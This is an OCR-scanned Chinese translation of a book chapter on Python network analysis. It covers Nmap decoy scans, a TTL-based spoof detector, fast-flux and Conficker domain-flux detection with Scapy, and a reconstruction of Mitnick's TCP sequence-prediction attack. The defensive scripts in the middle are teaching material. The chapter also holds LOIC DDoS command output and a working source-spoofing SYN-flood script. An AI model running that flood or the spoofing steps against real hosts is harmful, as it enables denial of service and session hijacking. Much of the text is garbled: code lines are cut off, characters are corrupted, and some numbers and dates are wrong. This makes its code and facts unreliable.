[!] DDoS Hivemind issued to: 192.168.1.3 

[+] Target CMD: TOPIC #LOIC:!lazor targetip=192.168.95.141 message: 
[!] DDoS Hivemind issued to: 192.168.1.5 

[+] Target CMD: TOPIC #LOIC:!lazor targetip=192.168.95.141 message: 
[+] 192.168.1.3 attacked 192.168.95.141 with 1000337 pkts. 

[+] 192.168.1.5 attacked 192.168.95.141 with 4133000 pkts. 





H. D. Moore 怎 样 解决 五 角 大 楼 的 困境 


1999 年 未 ， 美 国 五 角 大 楼 的 计算 机 网 络 面临 着 严重 的 危机 。 美 国 国防 总 部 ， 五 角 大 
楼 宣布 正 遭 受 着 一 系列 的 组 织 协调 的 复杂 的 攻击 。 最 新 发 布 的 工具 Nmap“， 使 得 任 
何人 扫描 网 络 的 服务 和 漏洞 变 得 更 容易 了 。 五 角 大 楼 担心 一 些 攻击 者 使 用 Nmap 识 
别 五 角 大 楼 庞大 的 计算 机 网 络 的 漏洞 地 图 。 


全 测 Nmap 扫 描 很 容易 ， 关 联 攻 击 者 的 地 址 ， 然 后 找到 物理 地 址 。 然 而 ， 攻 击 者 在 
Nmap 中 使 用 高 级 选项 ， 而 不 是 从 特定 的 攻击 者 地 址 发 动 扫描 ， 其 中 包括 似乎 来 自 
世界 各 地 的 扫描 的 诱饵。 五 角 大 楼 专家 很 难 分 清 时 间 扫 描 和 诱饵 扫描 之 间 的 关系 。 


当 专 家 研究 了 大 量 的 理论 方法 分 许 数据 的 记录 ， 最 后 7 岁 的 H.D.Moore， 传 奇 框 架 
Metasploit 框 架 的 创造 者 ， 给 出 了 一 个 可 行 的 解决 方案 。 他 建议 使 用 所 有 进来 的 数 
据 包 的 TTL 字 段 。 生 存 时 间 (TTL) 字 段 用 来 确认 一 个 IP 数 据 包 多 跳 可 以 到 达 目 的 地 。 
数据 包 没 通过 一 个 路 由 器 ， 路 由 器 就 减少 一 个 TTL 字 段 的 值 。Moore 意 识 到 这 可 能 
是 确认 扫描 数据 包 来 源 的 极 好 的 方法 。 对 于 记录 的 每 一 个 Nmap 扫 描 的 源 地 址 ， 他 
发 送 了 一 个 ICMP 数 据 包 确认 和 扫描 机 器 之 间 的 条 数 。 然 后 用 这 个 信息 来 区 分 是 攻 
击 者 还 是 诱饵。 显然 ， 只 有 攻击 者 才 有 正确 的 TTL 值 ， 而 诱饵 没 有 正确 的 TTL 值 。 
他 的 方案 可 行 ! 五 角 大 楼 要 求 Moore 在 1999 的 SANS 会 议 上 展示 自己 的 工具 和 研 
究 。Moore 称 他 的 工具 为 Nog， 因 为 它 记 录 了 Nmap 的 各 种 扫描 信息 。 


在 下 面 的 章节 中 ， 我 们 将 使 用 Python 重建 Moore 的 分 析 过 程 和 创建 他 的 工具 NIlog 。 
你 会 希望 了 解 一 个 7 岁 少 年 十 多 年 前 的 想法 : 简单 ， 优 雅 的 解决 检测 攻击 的 方案 。 


理解 TTL 字 上 段 


在 编写 脚本 之 前 ， 我 们 来 接 是 一 下 IP 数 据 包 的 TTL 字 段 。TTL 字 段 包 人 钨 8 个 bit， 有 效 
值 0 到 255。 当 计算 机 发 送 一 个 IP 数 据 包 时 ， 它 设置 TTL 字 段 为 可 以 到 达 目 的 地 的 最 
大 跳 ， 每 个 路 由 设备 改变 数据 包 的 TTL 字 段 值 。 如 果 TTL 字 段 为 零 ， 路 由 器 抛弃 这 
个 数据 包 防 止 无 限 循环 路 由 。 比 如 说 ， 如 果 我 ping 地 址 8.8.8.8 ， 初 始 化 TTL 为 
64 它 将 返回 TTL 的 值 为 53 我 们 可 以 看 到 数据 包 穿 过 了 11 个 路 由 设备 。 


target# ping -m 64 8.8.8.8 


PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 

64 bytes from 8.8.8.8: icmp_seq=1 ttl=53 time=48.0 ms 
64 bytes from 8.8.8.8: icmp_seq=2 ttl=53 time=49.7 ms 
64 bytes from 8.8.8.8: icmp_seq=3 ttl=53 time=59.4 ms 


引进 诱饵 扫描 的 是 1.6 版 本 ， 诱 人 饵 数 据 包 的 TTL 不 是 随机 的 也 不 是 正确 的 。 未 能 正确 
计算 TTL 允 许 Moore 确 认 这 些 数据 包 。 显 然 ，Nmap 的 代码 从 1999 年 得 到 显著 的 增 
长 和 发 展 ， 在 最 近 的 版 本 中 ，Nmap 使 用 下 面 的 算法 随机 的 设置 TTL。 该 算法 随机 
的 产生 一 个 TTL， 用 户 也 能 自己 指定 TTL 的 值 。 


/* Time to live */ 


if (ttl == -1) { 
myttl = (get_random_uint()% 23) + 37; 
} else { 
myttl = ttl; 
} 


为 了 运行 一 个 Nmap 诱 饪 扫描 ， 我 们 在 |P 地 址 后 面 加 上 参数 -D ， 在 这 种 情况 下 ， 
我 们 将 使 用 地 址 8.8.8.8 作为 诱饵 地 址 ， 此 外 ， 我 们 自己 指定 TTL 的 值 为 13， 
此 ， 下 面 我 们 用 TTL 为 13 的 诱 饰 地址 为 8.8.8.8 扫描 192.168.1.7 ° 


attacker$ nmap 192.168.1.7 -D 8.8.8.8 -ttl 13 

Starting Nmap 5.51 (http://nmap.org) at 2012-03-04 14:54 MST 
Nmap scan report for 192.168.1.7 

Host is up (0.015s latency). 

<..SNIPPED. .> 


在 目标 192.168.1.7 上 ， 我 们 在 详细 模式 下 打开 tcpdump ( -v )> SA SAM 
析 ( -nn )， 过 滤 特 定 的 地 址 8.8.8.8 ( 'host 8.8.8.8' )， 我 们 看 到 Nmap 成 功 
的 用 TTL 为 13， 诱 饵 地 址 为 8.8.8.8 发 送 了 数据 包 。 


target# tcpdump -i ethO -v -nn "host 8.8.8.8' 
8.8.8.8.42936 > 192.168.1.7.6: Flags [S], cksum Oxcae7 (correct), : 
690560664, win 3072, options [mss 1460], length 0 
14:56:41.289989 IP (tos 0x0, ttl 13, id 1625, offset ©, flags [none 
proto TCP (6), length 44) 
8.8.8.8.42936 > 192.168.1.7.1009: Flags [S], cksum Oxc6fc (cor! 
seq 690560664, win 3072, options [mss 1460], length 0 
14:56:41.289996 IP (tos 0x0, ttl 13, id 16857, offset 0, flags 
[none], proto TCP (6), length 44) 
8.8.8.8.42936 > 192.168.1.7.1110: Flags [S], cksum Oxc697 (cor) 
seq 690560664, win 3072, options [mss 1460], length 0 
14:56:41.290003 IP (tos Ox0, ttl 13, id 41154, offset 0, flags [nor 
proto TCP (6), length 44) 
8.8.8.8.42936 > 192.168.1.7.2601: Flags [S], cksum OxcOc4 (cor) 
seq 690560664, win 3072, options [mss 1460], length 0 
14:56:41.307069 IP (tos 0x0, ttl 13, id 63795, offset ©, flags [nor 
proto TCP (6), length 44) 
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用 Scapy 解 析 TTL 字 段 


让 我 们 开始 编写 我 们 的 脚本 来 打印 源 地 址 和 数据 包 里 面 的 TTL 值 。 这 一 点 上 ， 在 本 
章 的 剩余 部 分 我 们 会 使 用 Scapy 库 ， 你 也 可 以 简单 的 使 用 Dpkt 库 来 编写 这 个 代 
码 。 我 们 将 建立 一 个 函数 testTTL() 来 嗅 探 每 一 个 经 过 的 数据 包 ， 检 查 数据 包 的 
IP 层 ， 抽 取 IP 地 址 和 TTL 字 段 并 打印 字段 在 屏幕 上 。 


from scapy.all import * 
def testTTL(pkt): 
try: 
if pkt.haslayer(IP): 
ipsrc = pkt.getlayer(IP).src 
ttl = str(pkt.ttl) 
print '[+] Pkt Received From: '+ipsrct+' with TTL: ' + 1 
except: 
pass 


def main(): 

sniff(prn=testTTL, store=0) 
if _ name == '_ main_': 
main() 





运行 我 们 的 代码 ， 我 们 看 到 我 们 已 经 从 不 同 的 地 址 收 到 几 个 带 有 不 同 的 TTL 的 数据 
包 。 这 些 结果 也 包括 来 自 8.8.8.8 的 TTL 为 13 的 诱饵 扫描 。 我 们 知道 TTL 应 该 是 
64-13=51 跳 ， 我 们 可 以 认为 有 人 伪造 数据 包 。 应 该 注意 一 点 ，LInux/Unix 系 统 上 通 
常 初始 TTL 值 为 64， 而 Windows 系 统 初 始 TTL 值 为 128。 为 了 我 们 脚本 的 目的 ， 我 们 
假设 我 们 只 解析 来 自 Linux 扫 描 的 数据 包 ， 所 以 让 我 们 增加 一 个 函数 来 检查 实际 接受 
的 TTL ° 


analyst# python printTTL.py 

[+] Pkt Received From: 192.168.1.7 with TTL: 64 
[+] Pkt Received From: 173.255.226.98 with TTL: 52 
[+] Pkt Received From: 8.8.8.8 with TTL: 13 

[+] Pkt Received From: 8.8.8.8 with TTL: 13 

[+] Pkt Received From: 192.168.1.7 with TTL: 64 
[+] Pkt Received From: 173.255.226.98 with TTL: 52 
[+] Pkt Received From: 8.8.8.8 with TTL: 13 


我 们 的 函数 checkTTL() 需要 一 个 IP 源 地 址 和 对 应 的 TTL 值 作为 输入 并 输出 TTL 是 
否 有 效 的 信息 。 首 先 ， 让 我 们 用 一 个 条 件 与 语句 快速 的 消除 死人 IP 地 址 的 数据 包 

( 10.0.0.0-10.255.255.255 , 172.16.0.0-172.31.255.255 

和 192.168.0.0-192.168.255.255 ) ° 


为 此 ， 我 们 导入 IPy 库 ， 为 了 避免 和 Scapy 的 IP 类 冲突 ， 我 们 把 它 作 为 IPTEST ， 
如 果 IPTEST(ipsrc).iptype() 返回 'PRIVATE' ， 我 们 变 忽 略 检查 这 个 数据 
By ic 


我 们 从 相同 的 源 地 址 收 到 了 不 少 的 独特 的 数据 包 ， 我 们 只 需要 检查 源 地 址 一 次 。 如 
果 先 前 我 们 没 看 到 源 地 址 ， 让 我 们 构建 一 个 目的 地 址 与 源 地 址 相同 的 IP 数据 包 。 此 
外 ， 我 们 将 制作 一 个 ICMP 数 据 包 与 目的 地 址 向 回应 。 一 旦 目标 地 址 回应 ， 我 们 将 
TTL 值 放 在 字典 中 ， 通 过 |IP 源 地 址 索引 ， 我 们 再 来 检查 实际 收 到 的 TTL 值 和 原始 数 


据 包 里 面 的 TTL 值 。 数 据 包 可 能 会 走 不 同 的 路 线 来 到 达 目 的 地 ， 造 成 TTL 不 同 ， 然 
而 ， 如 果 跳 数 的 距离 相差 五 跳 ， 我 们 可 以 假定 ， 它 可 能 是 一 个 其 骗 性 的 TTL， 并 打 
印 警告 信息 在 屏幕 上 。 


from IPy import IP as IPTEST 
ttlValues = {} 
THRESH = 5 


def checkTTL(ipsrc, ttl): 

if IPTEST(ipsrc).iptype() == 'PRIVATE': 
return 

if not ttlValues.has_key(ipsrc): 
pkt = sri(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbc 
ttlValues[ipsrc] = pkt.ttl 

if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH: 
print('\n[!] Detected Possible Spoofed Packet From: ' + ips 
print('[!] TTL: ' + ttl + ', Actual TTL: * + str(ttlValues| 
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最 终 的 代码 。 少 于 50 行 的 代码 ， 我 们 拥有 是 数 十 年 前 Moore 为 五 角 大 楼 困境 的 解决 


# coding=UTF-8 

import time 

import optparse 

from scapy.all import * 

from IPy import IP as IPTEST 


ttlValues = {} 
THRESH = 5 


def checkTTL(ipsrc, ttl): 

if IPTEST(ipsrc).iptype() == 'PRIVATE': 
return 

if not ttlValues.has_key(ipsrc): 
pkt = sri(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbc 
ttlValues[ipsrc] = pkt.ttl 

if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH: 
print('\n[!] Detected Possible Spoofed Packet From: ' + ips 
print('[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues| 


def testTTL(pkt): 


try: 
if pkt.haslayer(IP): 
ipsrc = pkt.getlayer(IP).src 
ttl = str(pkt.ttl) 
print('[+] Pkt Received From: '+ipsrc+' with TTL: ' + 1 
except: 
pass 
def main(): 


parser = optparse.OptionParser("usage%prog -i<interface> -t <tl 
parser.add_option('-i', dest='iface', type='string', help='spec 
parser.add_option('-t', dest='thresh', type='int', help='specit 
(options, args) = parser.parse_args() 


if options.iface == None: 
conf.iface = ‘etho' 
else: 
conf.iface = options.iface 
if options.thresh != None: 
THRESH = options.thresh 
else: 
THRESH = 5 


sniff(prn=testTTL, store=0) 


if name == ' main _': 
main() 


图 


运行 我 们 的 代码 ， 我 们 可 以 看 到 它 正确 的 识别 了 诱饵 Nmap 扫 描 ， 来 
A 8.8.8.8 的 扫描 。 需 要 注意 的 是 ， 我 们 的 值 产生 于 一 个 默认 的 Linux 初 始 TTL 值 
64， 尺 管 RFC 1700 推 荐 的 默认 TTL 值 是 64， 但 是 Windows 系 统 还 是 将 128 作 为 TTL 





的 默认 初始 值 。 此 外 ， 其 他 一 些 Unix 变 种 的 系统 有 着 不 同 的 TTL 值 。 现 在 我 们 假定 
产生 数据 包 的 系统 为 Linux。 


analyst# python spoofDetect.py -i ethO -t 5 

[!] Detected Possible Spoofed Packet From: 8.8.8.8 
[!] TTL: 13, Actual TTL: 53 

[!] Detected Possible Spoofed Packet From: 8.8.8.8 
er aS Actual nS 

[!] Detected Possible Spoofed Packet From: 8.8.8.8 
[!] TTL: 13, Actual TTL: 53 

[!] Detected Possible Spoofed Packet From: 8.8.8.8 
LP] Thee 137 Actual ack: 53 

<..SNIPPED. ,> 


Storm) FAST È = £- Conficker4) Domain à © 


2007 年 ， 安 全 研究 人 员 确 认 一 种 新 技术 ， 曾 被 臭名 昭著 的 Storm 僵 尸 网 络 使 用 。 这 
种 技术 称 为 Fast 流 量 ， 利 用 DNS 记录 隐藏 命令 从 而 控制 Storm 僵 尸 网 络 。DNS 服 务 
是 通常 是 转换 域名 到 |IP 地 址 的 。 当 DNS 服务 返回 一 个 结果 时 ， 他 还 指定 了 TTL， 在 
主机 检查 之 前 任 然 有 效 。 


Storm 僵 尸 网 络 的 攻击 者 为 了 命令 和 控制 服务 器 而 频繁 的 改变 DNS 记录 。 事 实 上 ， 
他 们 使 用 的 2000 多 个 主机 散步 在 50 个 国家 384 个 供应 商 。 为 了 命令 和 控制 主机 ， 攻 
击 者 频繁 的 替换 IP 地 址 ， 确 保 DNS 返 回 很 短 的 TTL 结 果 。|IP 地 址 的 Fast 流 量 令 安全 
人 员 很 难 确 认 被 命令 和 控制 的 僵尸 网 络 ， 更 难 让 服务 器 脱 机 。 


Fast 很 难 从 Storm 人 和 僵尸 网 络 趣 载 下 来 ， 类 似 的 技术 次 年 用 于 辅助 感染 了 两 百 多 个 国 
家 的 7 百 多 万 电脑 。Conficker 蠕 虫 是 目前 为 止 最 成 功 的 计算 机 蠕虫 ， 通 过 攻击 
Windows 的 SMB 协 议 漏洞 来 传播 。 一 旦 被 感染 ， 脆 弱 的 主机 连接 到 一 个 命名 和 控制 
服务 器 等 待 进 一 步 指 示 。 确 认 和 阻止 和 命令 控制 主机 通讯 对 于 停止 攻击 是 完全 有 必 
要 的 。 然 而 ，Conficker 蠕 虫 使 用 当前 的 UTC 时 间 和 日 期 每 三 个 小 时 就 产生 不 同 的 域 
名 。 对 Conficker 和 迭代 意味 着 每 三 个 小 时 将 产生 50000 个 域 。 攻 击 者 只 需要 注册 极 少 
的 域名 到 夏 是 的 |P 就 可 以 命令 和 控制 服务 器 。 这 使 得 拦截 和 阻止 命令 和 控制 服务 器 
的 流量 很 困难 。 因 此 技术 人 员 将 它 命名 为 Domain 流 量 。 

在 下 面 的 章节 中 ， 我 们 将 编写 一 些 Python 脚 本 来 检测 识别 外 界 的 Fast 流 量 和 
Domain 流 量 攻击 。 

你 的 NDS 知道 一 些 你 不 知道 的 事 吗 ? 为 了 确认 外 界 的 Fast 流 量 和 Domain 流 量 ， 证 
我 们 快速 审查 一 下 DNS， 通 过 查看 域名 请 求 时 产生 的 流量 。 为 了 明白 这 些 ， 让 我 们 
执行 域名 查询 操作 。 注 意 ， 我 们 的 域名 服务 器 在 192.168.1.1 ， 翻 译 域名 

到 74.117.114.119 的 IP 地址。 


analyst# nslookup whitehouse.com 
Server: 192.168.1.1 

Address: 192.168.1.1#53 
Non-authoritative answer: 

Name: whitehouse.com 

Address: 74.117.114.119 


用 tcpdump 检查 NDS 流量 ， 我 们 可 以 看 到 客户 端 192.168.13.37 发 送 了 一 个 
DNS 请 求 给 192.168.1.1 。 特 别 是 客户 端 生成 了 DNS 快速 记录 (DNSQR) 请 求 Ipv4 
地 址 ， 服 务 器 响应 增加 DNS 资源 记录 (DNSRR) 并 提供 IP 地 址 。 


analyst# tcpdump -i ethO -nn ‘udp port 53' 

07:45:46.529978 IP 192.168.13.37.52120 >192.168.1.1.53: 63962+ A? 
whitehouse.com. (32) 

07:45:46.533817 IP 192.168.1.1.53>192.168.13.37.52120: 63962 1/0/0 

74.117.114.119 (48) 
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使 用 Scapy 解 析 DNS 流 量 


当 我 们 用 Scapy 研究 DNS 协议 请 求 ， 我 们 可 以 看 到 包含 在 每 一 个 A 记 录 的 DNSQR 
包含 了 请 求 名 ( qname )， 请 求 类 型 ( qtype ) 和 请 求 类 ( qclass )。 为 了 上 述 要 
求 ， 我 们 要 请 求 域名 的 lpv4 地 址 ， 让 qname 字段 等 于 域名 。DNS 服 务 响 应 通过 添 
加 DNSRR 包 含 资源 名 称 ( rrname )， 类 型 ( type )， 资源 记录 类 ( rclass ) 和 
TTL。 知 道 Fast 流 量 和 Domain 流 量 是 怎么 工作 的 ， 我 们 现在 可 以 使 用 Scapy 编写 
Python 脚本 分 析 可 确认 可 以 的 DNS 流量 。 


analyst# scapy 
Welcome to Scapy (2.0.1) 


>>>1s(DNSQR) 

qname : DNSStrField = C) 
qtype : ShortEnumField = (1) 
qclass : ShortEnumField = (1) 
>>>1s(DNSRR) 

rrname : DNSStrField = G) 
type : ShortEnumField = (1) 
rclass : ShortEnumField = (1) 
ttl : IntField = (0) 
rdlen : RDLenField = (None) 
rdata : RDataField = Cea) 


欧洲 网 络 与 信息 安全 机 构 通 过 了 一 个 分 析 网 络 流量 极 好 的 资源 。 他 们 提供 了 一 个 光 
盘 |SO 镜 像 ， 包 含 了 一 些 网 络 捕获 和 练习 。 你 可 以 从 下 面 网 站 下 载 : 
http://www.enisa.europa.eu/activities/cert/support/exercise/live-dvd-iso-images ° 
练习 7 提供 了 一 个 练习 Fast 流 量 行为 的 例子 的 PCAP。 此 外 你 可 能 希望 被 间谍 软件 或 


者 恶意 软件 感染 的 虚拟 机 在 活动 前 在 受 控 的 实验 环境 安全 检查 流量 。 为 了 我 们 的 目 
的 ， 让 我 们 假设 你 现在 有 一 个 捕获 的 网 络 流量 包 fastFlux.pcap 包含 了 一 些 你 想 
要 分 析 的 NDS 流量 。 


用 Scapy 检 测 Fast 流 量 


让 我 们 编写 Python 脚本 阅读 pcap 并 分 析 所 有 的 包含 DNSRR 的 数据 包 。 Scapy W 
能 强大 ， haslayer() 函数 将 协议 类 型 作为 输入 ， 并 返回 一 个 布尔 值 。 如 果 数 据 
包 包 含 一 个 DNSRR， 我 们 将 抽取 包含 适当 域名 和 |P 地 址 的 rname 和 rdata È 

量 。 我 们 可 以 检查 我 们 维护 的 域名 字典 ， 通 过 域名 索引 。 如 果 是 我 之 前 见 过 的 域 
名 ， 我 们 将 看 看 它 是 否 与 先前 的 IP 地 址 相关 联 。 如 果 它 有 一 个 不 同 以 前 的 IP 地 址 ， 
我 们 将 增加 到 我 们 维护 的 字典 。 相 反 ， 如 果 我 们 发 现 了 一 个 新 域名 ， 我 们 添加 它 到 
我 们 的 字典 。 我 们 添加 这 个 域名 的 |P 地 址 作为 存储 我 们 字典 值 的 数组 的 第 一 个 元 
素 。 这 看 起 来 有 些 复 杂 ， 但 是 我 们 想 能 够 存储 所 有 的 域名 和 他 们 关联 的 不 同 的 IP 地 
址 。 为 了 检测 Fast 流 量 ， 我 们 需要 知道 那个 域名 有 多 个 IP 地 址 。 在 研究 所 有 的 数据 
包 之 后 ， 我 们 打印 所 有 的 域名 和 每 个 域名 的 多 个 IP 地 址 。 


from scapy.all import * 
dnsRecords = {} 
def handlePkt(pkt): 
if pkt.haslayer(DNSRR): 
rrname = pkt.getlayer(DNSRR).rrname 
rdata = pkt.getlayer(DNSRR).rdata 
if dnsRecords.has_key(rrname): 
if rdata not in dnsRecords[rrname]: 
dnsRecords[rrname].append(rdata) 
else: 
dnsRecords[rrname] = [] 
dnsRecords[rrname].append(rdata) 
def main(): 
pkts = rdpcap('fastFlux.pcap' ) 
for pkt in pkts: 
handlePkt (pkt ) 
for item in dnsRecords: 
print('[+] 'titem+' has '+str(len(dnsRecords[item])) + ' ur 
if _name__ == '__main_': 
main() 


EE 


运行 我 们 的 代码 ， 我 们 可 以 看 到 至 少 有 四 个 域名 与 多 个 IP 相 对 应 。 所 有 的 死 四 个 域 
名 在 过 去 实际 上 被 Fast 流 量 所 利用 。 





analyst# python testFastFlux.py 

[+] ibank-halifax.com. has 100,379 unique IPs. 
[+] armsummer.com. has 14,233 unique IPs. 

[+] boardhour.com. has 11,900 unique IPs. 

[+] swimhad.com. has 11, 719 unique IPs. 


Fl Scapy #7] Domain ii = 


接 下 来 ， 我 们 开始 分 析 被 Conficker 蠕 虫 感染 的 机 器 。 你 可 以 感染 你 自己 的 机 器 或 者 
下 载 一 些 捕获 的 样本 。 许 多 第 三 方 网 站 包含 不 同 的 Conficker 捕 获 。 由 于 Conficker 
蠕虫 利用 Domain 流 量 ， 我 们 需要 查看 服务 器 包含 未 知 域名 的 错误 信息 的 响应 。 不 
同 版 本 的 Conficker 蠕 虫 生 成 几 种 DNS。 因 为 几 个 域名 是 伪造 的 ， 为 了 掩盖 丨 实 的 命 
令 控 制服 务 器 。 大 多 数 DNS 服 务 器 缺乏 将 域名 转换 成 盟 实 的 地 址 并 替代 生成 的 错误 
的 信息 的 能 力 。 让 我 们 通过 确认 所 有 的 包含 hame-error 信 息 的 DNS 响 应 来 确认 
Domain 流 量 。 为 了 得 到 完整 的 Conficker 蠕 虫 使 用 过 的 域名 列表 ， 我 们 可 以 在 
http://www.cert.at/downloads/data/conficker_en.html 找到 。 


from scapy.all import * 
def dnsQRTest(pkt): 
if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53: 
rcode = pkt.getlayer(DNS).rcode 
qname = pkt.getlayer(DNSQR).qname 
if rcode == 3: 
print('[!] Name request lookup failed: ' + qname) 
return True 
else: 
return False 
def main(): 
unAnsReqs = 0 
pkts = rdpcap('domainFlux.pcap' ) 
for pkt in pkts: 
if dnsQRTest(pkt): 
unAnsReqs = unAnsReqgs + 1 
print('[!] '+str(unAnsReqs)+' Total Unanswered Name Requests' ) 
if _name__ == '__main_': 
main() 


ET 
EB YRMN BAT WARN > KAT UA SF] — 227 F Conficker Domain A = 49 È Br 
域名 。 成 功 1 我 们 可 以 确认 攻击 。 在 下 一 节 里 让 我 们 用 我 们 的 分 析 技 能 重新 审视 一 
下 发 生 在 15 年 前 的 复杂 的 攻击 。 


analyst# python testDomainFlux.py 

[!] Name request lookup failed: tkggvtqvj.org. 
[!] Name request lookup failed: yqdqyntx.com. 
[!] Name request lookup failed: uvcaylkgdpg.biz. 
[!] Name request lookup failed: vzcocljtfi.biz. 
[!] Name request lookup failed: wojpnhwk.cc. 
[!] Name request lookup failed: plrjgcjzf.net. 
[!] Name request lookup failed: qegiche.ws. 

[!] Name request lookup failed: ylktrupygmp.cc. 
[!] Name request lookup failed: ovdbkbanqw.com. 
<..SNIPPED. ,> 

[!] 250 Total Unanswered Name Requests 


I X KAFE 54° TCP Æ 7] FA N 


1996 年 2 月 16 日 结束 了 一 个 臭名 昭著 的 黑客 的 统治 。 其 疯狂 的 犯罪 行为 包含 资 取 价 
值 数 百 万 美元 的 商业 机 密 。15 年 来 ， 凯 文 米 特 尼 克 获 得 未 授权 访问 计算 机 ， 穷 取 私 
人 信息 ， 试 图 抓 他 的 人 都 厌倦 了 ， 但 是 最 后 一 个 针对 他 的 小 组 抓 到 了 他 。 


Tsutomu Shimomura， 一 个 计算 物理 理学 家 ， 帮 助 逮 捕 了 米 特 尼克 。 在 1992 的 手机 
安全 听证 会 后 ， 米 特 尼克 便 成 为 了 他 的 目标 。1994 年 12 月 ， 有 人 间 入 了 他 家 的 电脑 
系统 。 相 信 这 次 攻击 是 米 特 尼克 并 被 他 的 新 的 攻击 方法 所 着 迷 ， 他 本 来 领导 的 LED 
队 在 第 二 年 开始 追踪 米 特 尼克 。 


他 好 奇 攻击 向 量 是 什么 ， 以 前 从 没 见 到 过 ， 米 特 尼 克 用 了 一 个 方法 劫持 了 TCP 会 
话 。 这 种 技术 被 称 为 TCP 序 列 预测 ， 攻 击 缺 乏 随 机 性 的 序列 号 跟踪 单个 网 络 连接 。 
这 个 技术 接合 I|P 地 址 欺骗， 人 允许 米 特 尼克 劫持 他 家 电脑 的 一 个 连接 。 在 下 面 的 章节 
中 ， 我 们 将 重 现 并 编写 米 特 尼克 曾经 使 用 过 的 TCP 序 列 预测 的 工具 和 攻击 。 


你 自己 的 TCP 序 列 预测 


米 特 尼克 攻击 过 的 机 器 有 一 个 可 靠 的 远程 连接 服务 协议 。 这 个 远程 服务 能 访问 米 特 
尼克 的 受害 者 ， 通 过 运行 在 TCP 513 端 口上 的 远程 登陆 协议 (rlogin)。 而 不 是 使 用 公 
钥 协 商 或 者 是 密码 方式 ，rlogin 使 用 了 一 个 不 安全 的 认证 方法 --- 检 查 RIP Heb o 
此 ， 为 了 攻击 Shimomura 的 电脑 米 特 尼克 必 须 1. 找 到 一 个 可 信 的 服务 器 ; 2. 沉 默 的 
可 信服 务 器 ; 3. 欺 骗 来 自 服务 器 的 连接 ; 4. 育 目的 欺骗 正确 的 TCP 三 次 握手 包 的 
ACK 包 。 听 起 来 比 实际 上 更 难 ，1994 年 1 月 25 日 ，Shimomura 发 布 了 这 次 攻击 的 详 
细 描 述 在 新 闻 博 客 上 。 通 过 看 他 发 布 的 技术 细节 分 析 这 次 攻击 ， 我 们 将 编写 一 个 
Python 脚本 来 执行 类 似 的 攻击 。 


在 米 特 尼克 确认 了 Shimomura 的 私人 电脑 上 有 一 个 可 人 靠 的 远程 服务 ， 他 需要 那个 机 
器 沉默 。 如 果 机 器 注意 到 尝试 使 用 他 的 |P 地 址 其 骗 连 接 ， 机 器 将 会 发 送 重 置 数 据 包 
关闭 连接 。 为 了 让 机 器 沉默 ， 米 特 尼 克 发 送 了 一 类 啊 的 TCP SYN 包 到 服务 器 的 登陆 
端口 。 被 称 为 SYN 洪 水 攻击 ， 这 个 攻击 充满 了 服务 器 的 连接 序列 并 保持 它 的 响应 。 
从 Shimomura 发 布 的 细节 来 看 ， 我 们 看 到 一 系列 的 TCP SYN 包 发 送 到 目标 主机 的 
登陆 端口 。 


14:18:22.516699 130.92.6.97.600 > server.login: S 
1382726960: 1382726960(0) win 4096 

14:18:22.566069 130.92.6.97.601 > server.login: S 
1382726961:1382726961(0) win 4096 

14:18:22.744477 130.92.6.97.602 > server.login: S 
1382726962:1382726962(0) win 4096 

14:18:22.830111 130.92.6.97.603 > server.login: S 
1382726963:1382726963(0) win 4096 

14:18:22.886128 130.92.6.97.604 > server.login: S 
1382726964:1382726964(0) win 4096 

14:18:22.943514 130.92.6.97.605 > server.login: S 
1382726965 :1382726965(0) win 4096 

<..SNIPPED..? 


用 Scapy 制 作 SYN 洪 水 


用 Scapy 简单 的 复制 一 个 TCP SYN 洪 水 攻击 ， 我 们 将 制作 一 些 IP 数 据 包 ， 有 递增 
的 TCP 源 端口 和 不 断 的 TCP 513 目 标 端口 。 


from scapy.all import * 
def synFlood(src, tgt): 
for sport in range(1024, 65535): 

IPlayer = IP(src=src, dst=tgt) 
TCPlayer = TCP(Sport=sport, dport=513) 
pkt = IPlayer / TCPlayer 
send(pkt) 

SECs = OR 12% 


tgt = "192.168.1.3" 
synFlood(src, tgt) 


运行 攻击 发 送 TCP SYNAGE HER FRET MR > HEME > AAMRA 
标 发 送 TCP 重 置 包 的 能 力 。 

mitnick# python synFlood.py 

Sent 1 packets. 

Sent 1 packets. 

Sent 1 packets. 

Sent 1 packets. 


<..SNIPPED. ,> 


计算 TCP 序 列 号 


现在 攻击 变 得 有 一 些 有 趣 了 。 随 着 远程 服务 器 的 沉默 ， 米 特 尼 克 可 以 欺骗 目标 的 
TCP 连 接 。 然 而 ， 这 取决 于 他 发 送 伪 造 的 SYN 的 能 力 ，Shimomura 机 器 TCP 连 接 后 
的 一 个 TCP ACK 数 据 包 。 为 了 完成 连接 ， 米 特 尼 克 需 要 需要 正确 的 猿 到 TCP ACK 
的 序列 号 ， 因 为 他 无 法 观察 到 他 ， 并 返回 一 个 正确 的 猜测 的 TCP ACK 序 列 号 。 为 了 
正确 计算 TCP 序 列 号 ， 米 特 尼 克 从 名 为 apollo.it.luc.edu 的 大 学 机 器 发 送 了 一 
系列 的 SYN 数 据 包 ， 收 到 SYN 之 后 ，Shimomura 的 机 器 的 终端 响应 了 一 个 带 序列 号 
的 TCP ACK 数 据 包 注 意 下 面 隐 藏 技术 细节 的 序列 

号 : 2022080000, 2022208000, 2022336000, 2022464000 。 每 个 增 量 相差 
128000， 这 让 计算 正确 的 TCP 序 列 号 更 加 容易 。( 注意 ， 大 多 数 现代 的 操作 系统 今 
天 提供 更 强大 的 随机 TCP 序 列 号 。) 


14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 
1382726992:1382726992(0) win 4096 

14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 
2022080000: 2022080000(0) ack 1382726993 win 4096 
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 
1382726993 :1382726993(0) win 0 

14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 
1382726993:1382726993(0) win 4096 

14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 
2022208000: 2022208000(0) ack 1382726994 win 4096 
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 
1382726994:1382726994(0) win 0 

14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 
